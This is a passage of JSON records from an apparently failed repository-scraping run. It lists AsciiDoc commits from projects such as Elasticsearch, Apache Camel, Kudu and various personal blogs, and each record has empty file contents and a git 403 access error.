'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"15727ae8ed6e9a5abf03009b15e1ec93c051fa50","subject":"[DOCS] Fixed formatting of Example headings. (#33038)","message":"[DOCS] Fixed formatting of Example headings. (#33038)\n\n","repos":"gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/painless\/painless-execute-script.asciidoc","new_file":"docs\/painless\/painless-execute-script.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a13f062f8ff70de904ee2d89c67be109db213047","subject":"Added XMLTokenizer language to Gitbook","message":"Added XMLTokenizer language to Gitbook\n","repos":"JYBESSON\/camel,onders86\/camel,Thopap\/camel,sverkera\/camel,tlehoux\/camel,yuruki\/camel,Fabryprog\/camel,lburgazzoli\/apache-camel,rmarting\/camel,bgaudaen\/camel,ullgren\/camel,gnodet\/camel,bhaveshdt\/camel,nikhilvibhav\/camel,jonmcewen\/camel,christophd\/camel,nboukhed\/camel,akhettar\/camel,christophd\/camel,hqstevenson\/camel,jonmcewen\/camel,isavin\/camel,mgyongyosi\/camel,allancth\/camel,pax95\/camel,neoramon\/camel,acartapanis\/camel,tlehoux\/camel,sverkera\/camel,lburgazzoli\/camel,isavin\/camel,gnodet\/camel,lburgazzoli\/apache-camel,NickCis\/camel,adessaigne\/camel,bhaveshdt\/camel,onders86\/camel,tdiesler\/camel,sverkera\/camel,apache\/camel,sirlatrom\/camel,anton-k11\/camel,sabre1041\/camel,JYBESSON\/camel,pax95\/camel,pax95\/camel,apache\/camel,mcollovati\/camel,christophd\/camel,lburgazzoli\/camel,scranton\/camel,apache\/camel,bhaveshdt\/camel,kevinearls\/camel,tdiesler\/camel,punkhorn\/camel-upstream,gautric\/camel,lburgazzoli\/camel,pkletsko\/camel,nboukhed\/camel,Thopap\/camel,punkhorn\/camel-upstream,tkopczynski\/camel,kevinearls\/camel,tadayosi\/camel,driseley\/camel,bhaveshdt\/camel,prashant2402\/camel,anton-k11\/camel,gilfernandes\/camel,ssharma\/camel,sverkera\/camel,tlehoux\/camel,lburgazzoli\/apache-camel,gnodet\/camel,jamesnetherton\/camel,jamesnetherton\/camel,prashant2402\/camel,w4tson\/camel,allancth\/camel,rmarting\/camel,cunningt\/camel,tadayosi\/camel,anton-k11\/camel,CodeSmell\/camel,ullgren\/camel,prashant2402\/camel,lburgazzoli\/apache-camel,pkletsko\/camel,acartapanis\/camel,drsquidop\/camel,JYBESSON\/camel,curso007\/camel,curso007\/camel,alvinkwekel\/camel,anton-k11\/camel,JYBESSON\/camel,objectiser\/camel,anoordover\/camel,DariusX\/camel,yuruki\/camel,bgaudaen\/camel,gautric\/camel,chirino\/camel,w4tson\/camel,anoordover\/camel,jkorab\/camel,neoramon\/camel,rmarting\/camel,isavin\/camel,hqstevenson\/camel,drsquidop\/camel,tkopczynski\/camel,drsquidop\/camel,bgaudaen\/camel,veithen\/camel,kevinearls\/camel,rmarting\/camel,punkhorn\/camel-upstream,jkorab\/camel,chirino\/camel,CodeSmell\/camel,snurmine\/camel,tkopczynski\/camel,tadayosi\/camel,drsquidop\/camel,driseley\/camel,snurmine\/camel,snurmine\/camel,yuruki\/camel,RohanHart\/camel,jamesnetherton\/camel,mcollovati\/camel,kevinearls\/camel,CodeSmell\/camel,mgyongyosi\/camel,tdiesler\/camel,jarst\/camel,sirlatrom\/camel,gilfernandes\/camel,scranton\/camel,veithen\/camel,allancth\/camel,lburgazzoli\/camel,prashant2402\/camel,jamesnetherton\/camel,cunningt\/camel,adessaigne\/camel,anoordover\/camel,nikhilvibhav\/camel,bgaudaen\/camel,snurmine\/camel,onders86\/camel,gautric\/camel,cunningt\/camel,scranton\/camel,chirino\/camel,alvinkwekel\/camel,bhaveshdt\/camel,mcollovati\/camel,nboukhed\/camel,neoramon\/camel,hqstevenson\/camel,jamesnetherton\/camel,adessaigne\/camel,allancth\/camel,DariusX\/camel,christophd\/camel,RohanHart\/camel,pmoerenhout\/camel,neoramon\/camel,jonmcewen\/camel,yuruki\/camel,sirlatrom\/camel,curso007\/camel,Fabryprog\/camel,w4tson\/camel,objectiser\/camel,gnodet\/camel,sabre1041\/camel,sabre1041\/camel,lburgazzoli\/camel,ssharma\/camel,adessaigne\/camel,acartapanis\/camel,ssharma\/camel,isavin\/camel,snurmine\/camel,ullgren\/camel,gilfernandes\/camel,gnodet\/camel,dmvolod\/camel,snurmine\/camel,mgyongyosi\/camel,nboukhed\/camel,pmoerenhout\/camel,jarst\/camel,scranton\/camel,onders86\/camel,pkletsko\/camel,yuruki\/camel,sabre1041\/camel,anoordover\/camel,davidkarlsen\/camel,scranton\/camel,jonmcewen\/camel,zregvart\/camel,cunningt\/camel,mgyongyosi\/camel,chirino\/camel,allancth\/camel,lburgazzoli\/apache-camel,prashant2402\/camel,jkorab\/camel,RohanHart\/camel,alvinkwekel\/camel,rmarting\/camel,mcollovati\/camel,drsquidop\/camel,onders86\/camel,dmvolod\/camel,ssharma\/camel,apache\/camel,pax95\/camel,tadayosi\/camel,akhettar\/camel,scranton\/camel,jkorab\/camel,dmvolod\/camel,anton-k11\/camel,anoordover\/camel,RohanHart\/camel,cunningt\/camel,hqstevenson\/camel,veithen\/camel,Thopap\/camel,objectiser\/camel,JYBESSON\/camel,jkorab\/camel,davidkarlsen\/camel,curso007\/camel,driseley\/camel,nboukhed\/camel,mgyongyosi\/camel,NickCis\/camel,NickCis\/camel,JYBESSON\/camel,cunningt\/camel,adessaigne\/camel,sirlatrom\/camel,gautric\/camel,dmvolod\/camel,gautric\/camel,sabre1041\/camel,objectiser\/camel,pkletsko\/camel,zregvart\/camel,kevinearls\/camel,bhaveshdt\/camel,salikjan\/camel,akhettar\/camel,w4tson\/camel,NickCis\/camel,sirlatrom\/camel,pmoerenhout\/camel,ullgren\/camel,zregvart\/camel,jarst\/camel,jonmcewen\/camel,apache\/camel,dmvolod\/camel,tlehoux\/camel,CodeSmell\/camel,pmoerenhout\/camel,sverkera\/camel,curso007\/camel,pkletsko\/camel,pax95\/camel,gilfernandes\/camel,veithen\/camel,anton-k11\/camel,neoramon\/camel,tdiesler\/camel,gautric\/camel,sabre1041\/camel,NickCis\/camel,isavin\/camel,tkopczynski\/camel,tkopczynski\/camel,isavin\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,bgaudaen\/camel,nicolaferraro\/camel,tdiesler\/camel,ssharma\/camel,nicolaferraro\/camel,DariusX\/camel,tlehoux\/camel,gilfernandes\/camel,jarst\/camel,Thopap\/camel,bgaudaen\/camel,prashant2402\/camel,tkopczynski\/camel,rmarting\/camel,tadayosi\/camel,allancth\/camel,lburgazzoli\/camel,pax95\/camel,driseley\/camel,pmoerenhout\/camel,tlehoux\/camel,w4tson\/camel,christophd\/camel,sirlatrom\/camel,davidkarlsen\/camel,jarst\/camel,chirino\/camel,akhettar\/camel,veithen\/camel,jkorab\/camel,akhettar\/camel,nikhilvibhav\/camel,acartapanis\/camel,acartapanis\/camel,nboukhed\/camel,gilfernandes\/camel,mgyongyosi\/camel,Thopap\/camel,yuruki\/camel,zregvart\/camel,veithen\/camel,nicolaferraro\/camel,ssharma\/camel,acartapanis\/camel,Fabryprog\/camel,onders86\/camel,adessaigne\/camel,akhettar\/camel,NickCis\/camel,w4tson\/camel,kevinearls\/camel,chirino\/camel,curso007\/camel,driseley\/camel,sverkera\/camel,tadayosi\/camel,salikjan\/camel,neoramon\/camel,davidkarlsen\/camel,nicolaferraro\/camel,hqstevenson\/camel,anoordover\/camel,RohanHart\/camel,apache\/camel,drsquidop\/camel,driseley\/camel,DariusX\/camel,hqstevenson\/camel,pmoerenhout\/camel,RohanHart\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,jarst\/camel,jamesnetherton\/camel,pkletsko\/camel,Fabryprog\/camel,tdiesler\/camel,Thopap\/camel,lburgazzoli\/apache-camel,dmvolod\/camel,christophd\/camel","old_file":"camel-core\/src\/main\/docs\/xtokenize-language.adoc","new_file":"camel-core\/src\/main\/docs\/xtokenize-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"588abf6fa9d572ae907407e3fe0e7c62fb5d1e4f","subject":"Correct 'RAFT' to 'Raft'","message":"Correct 'RAFT' to 'Raft'\n\nChange-Id: Id084193ddb70f50d7d86abd2520cb7437c913e5d\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1958\nTested-by: Kudu Jenkins\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"cloudera\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,cloudera\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/introduction.adoc","new_file":"docs\/introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd9b712238d8b8540e9399f9d39de52c22510392","subject":"Update 2015-09-25-Testing-123.adoc","message":"Update 2015-09-25-Testing-123.adoc","repos":"tomas\/tomas.github.io,tomas\/tomas.github.io,tomas\/tomas.github.io","old_file":"_posts\/2015-09-25-Testing-123.adoc","new_file":"_posts\/2015-09-25-Testing-123.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomas\/tomas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54d7601349867b3d64e3b20bb27f1ce1647f6565","subject":"Update 2016-07-15-Git-command.adoc","message":"Update 2016-07-15-Git-command.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-07-15-Git-command.adoc","new_file":"_posts\/2016-07-15-Git-command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e220d39c8af5d40fb0f53900a406d14a17a9389a","subject":"Update 2016-06-10-Modulos-para-Angular-JS.adoc","message":"Update 2016-06-10-Modulos-para-Angular-JS.adoc","repos":"willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com,willcrisis\/www.willcrisis.com","old_file":"_posts\/2016-06-10-Modulos-para-Angular-JS.adoc","new_file":"_posts\/2016-06-10-Modulos-para-Angular-JS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/willcrisis\/www.willcrisis.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaced73f89ee5c56c1802834424ad62c1bb4678e","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"711ee1e8d4a0d26e4cdef29e74ddc49d90c61182","subject":"[DOCS] Add FAQ for ML rolling upgrade issue (elastic\/x-pack-elasticsearch#1390)","message":"[DOCS] Add FAQ for ML rolling upgrade issue (elastic\/x-pack-elasticsearch#1390)\n\n* [DOCS] Add FAQ for ML rolling upgrade issue\r\n\r\n* [DOCS] More info for ML rolling upgrade issue\r\n\nOriginal commit: elastic\/x-pack-elasticsearch@be195477b0ff4f2b173dce67db8c165724a34417\n","repos":"gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,nknize\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,coding0011\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,scorpionvicky\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/en\/ml\/troubleshooting.asciidoc","new_file":"docs\/en\/ml\/troubleshooting.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"833bff941a0054bda1a6932d527ce7a8d034e07a","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"012921625503ca53be7dd00a6c51868a38b82e7f","subject":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","message":"Update 2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","repos":"mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog,mairandomness\/randomblog","old_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_file":"_posts\/2017-07-11-The-very-scary-phenomenum-of-things-starting-to-get-concrete.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mairandomness\/randomblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"208a6d078d6f9ba7e6773fa68c109571588fc9a0","subject":"Update 2016-03-08-Check-crontab-syntax.adoc","message":"Update 2016-03-08-Check-crontab-syntax.adoc","repos":"richard-popham\/richard-popham.github.io,richard-popham\/richard-popham.github.io,richard-popham\/richard-popham.github.io,richard-popham\/richard-popham.github.io","old_file":"_posts\/2016-03-08-Check-crontab-syntax.adoc","new_file":"_posts\/2016-03-08-Check-crontab-syntax.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/richard-popham\/richard-popham.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"889c02e6436490635d5bfc0f5c8cf750afef407b","subject":"Update 2017-08-04-no-more-os-path-walk.adoc","message":"Update 2017-08-04-no-more-os-path-walk.adoc","repos":"debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io,debbiezhu\/debbiezhu.github.io","old_file":"_posts\/2017-08-04-no-more-os-path-walk.adoc","new_file":"_posts\/2017-08-04-no-more-os-path-walk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debbiezhu\/debbiezhu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14c313345dbc0b9a528b13dcdf7032c59d22ee9a","subject":"Update 2016-11-08-webpack-typescript-resolve-indexts-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-indexts-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-indexts-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-indexts-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"544dfb83592ddc1b8bfc8c8247ed82fb5f2a6319","subject":"Update 2016-04-24-Do-you-trust-to-your-unit-tests.adoc","message":"Update 2016-04-24-Do-you-trust-to-your-unit-tests.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2016-04-24-Do-you-trust-to-your-unit-tests.adoc","new_file":"_posts\/2016-04-24-Do-you-trust-to-your-unit-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"da38147058097ef93f0dd7d454f7e6ee0a87f2eb","subject":"Testcontainers blog post","message":"Testcontainers blog post\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2020-03-19-integration-testing-for-change-data-capture-with-testcontainers.adoc","new_file":"blog\/2020-03-19-integration-testing-for-change-data-capture-with-testcontainers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53dcf4c01cde1b67d3c07fe0778b0e47a4a84551","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ce589c9eb144450c2fb2d81b69f67b8c7f5f5a1","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ad34539f6759da91e60ae8d8fc7f13d8786ea7d","subject":"Update 2014-05-06-Source-repository-usage.adoc","message":"Update 2014-05-06-Source-repository-usage.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-05-06-Source-repository-usage.adoc","new_file":"_posts\/2014-05-06-Source-repository-usage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"671c5dddf45462997ed64ba79a17d84e0ab1ce65","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4315228ee24272c9a4e50a68dfcff810ab51557e","subject":"Update 2017-08-07-Drowning-in-Java-Script.adoc","message":"Update 2017-08-07-Drowning-in-Java-Script.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-07-Drowning-in-Java-Script.adoc","new_file":"_posts\/2017-08-07-Drowning-in-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8120633b342dc0e3c4aa715695a5460a761be808","subject":"y2b create post The Levitating Speaker Strikes Back...","message":"y2b create post The Levitating Speaker Strikes Back...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-09-The-Levitating-Speaker-Strikes-Back.adoc","new_file":"_posts\/2017-03-09-The-Levitating-Speaker-Strikes-Back.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f48f6141e706f166eb4cad4242b0642ccfd664ac","subject":"Update 2017-09-11-nativescript-and-wordpress-rest-api.adoc","message":"Update 2017-09-11-nativescript-and-wordpress-rest-api.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-11-nativescript-and-wordpress-rest-api.adoc","new_file":"_posts\/2017-09-11-nativescript-and-wordpress-rest-api.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"340b55b4349719bf65ce6d6c2df60c7ad0809ec6","subject":"Update 2018-01-15-Configurando-hosts-virtuales-Apache.adoc","message":"Update 2018-01-15-Configurando-hosts-virtuales-Apache.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2018-01-15-Configurando-hosts-virtuales-Apache.adoc","new_file":"_posts\/2018-01-15-Configurando-hosts-virtuales-Apache.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fafe8dac3c12339a7054065d255d8095db677ddc","subject":"Update 2015-05-31-Lost-your-CS2-serial-number.adoc","message":"Update 2015-05-31-Lost-your-CS2-serial-number.adoc","repos":"mtx69\/mtx69.github.io,mtx69\/mtx69.github.io,mtx69\/mtx69.github.io","old_file":"_posts\/2015-05-31-Lost-your-CS2-serial-number.adoc","new_file":"_posts\/2015-05-31-Lost-your-CS2-serial-number.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mtx69\/mtx69.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8b3f850053ce7e4fdccf44145f3207a1062295","subject":"job: #9893 Introducing note analyzing and designing a non-eclipse xtuml2masl.","message":"job: #9893 Introducing note analyzing and designing a non-eclipse xtuml2masl.\n","repos":"leviathan747\/mc,keithbrown\/mc,cortlandstarrett\/mc,xtuml\/mc,cortlandstarrett\/mc,lwriemen\/mc,keithbrown\/mc,rmulvey\/mc,keithbrown\/mc,xtuml\/mc,keithbrown\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,cortlandstarrett\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,rmulvey\/mc,cortlandstarrett\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc,xtuml\/mc,rmulvey\/mc,leviathan747\/mc,keithbrown\/mc,leviathan747\/mc,keithbrown\/mc,rmulvey\/mc,xtuml\/mc,cortlandstarrett\/mc","old_file":"doc\/notes\/9893_xtuml2masl_int.adoc","new_file":"doc\/notes\/9893_xtuml2masl_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"358db7e3e91243674e737befbf3217d492db00b1","subject":"Update 2017-07-10-Building-ipa-server-for-aarch64-on-a-Raspberry-Pi-3-and-CentO-S.adoc","message":"Update 2017-07-10-Building-ipa-server-for-aarch64-on-a-Raspberry-Pi-3-and-CentO-S.adoc","repos":"wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io,wzzrd\/hubpress.io","old_file":"_posts\/2017-07-10-Building-ipa-server-for-aarch64-on-a-Raspberry-Pi-3-and-CentO-S.adoc","new_file":"_posts\/2017-07-10-Building-ipa-server-for-aarch64-on-a-Raspberry-Pi-3-and-CentO-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wzzrd\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4077a322c585c48030a28ec1116ee5096fdb4255","subject":"Docs: Fix typo - datehistogram","message":"Docs: Fix typo - datehistogram\n\ndate_histogram in place of datehistogram\n\nCloses 